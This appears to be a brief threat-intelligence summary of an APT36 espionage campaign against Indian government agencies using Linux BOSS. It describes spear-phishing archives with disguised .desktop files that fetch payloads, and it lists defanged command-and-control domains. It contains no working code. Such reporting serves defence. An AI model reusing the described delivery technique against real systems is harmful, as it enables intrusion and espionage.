A well-known Pakistan-based threat group, APT36, has launched a sophisticated cyber-espionage campaign targeting Indian government agencies, focusing on the Linux BOSS operating system. This campaign involves spear-phishing emails with disguised payloads, demonstrating their evolving tactics to bypass traditional security measures. #APT36 #LinuxBOSSPayloads
Keypoints
- APT36 has shifted its focus to target Linux BOSS, an Indian government-specific operating system.
- The campaign starts with spear-phishing emails containing weaponized archive files with disguised .desktop shortcuts.
- The .desktop files execute commands to download and run malicious payloads while tricking victims with decoy PDFs.
- Malware communicates with suspicious domains like securestore[.]cv and modgovindia[.]space for C2 operations.
- The group continues to evolve, using multi-platform strategies to maintain persistent espionage and exfiltrate data.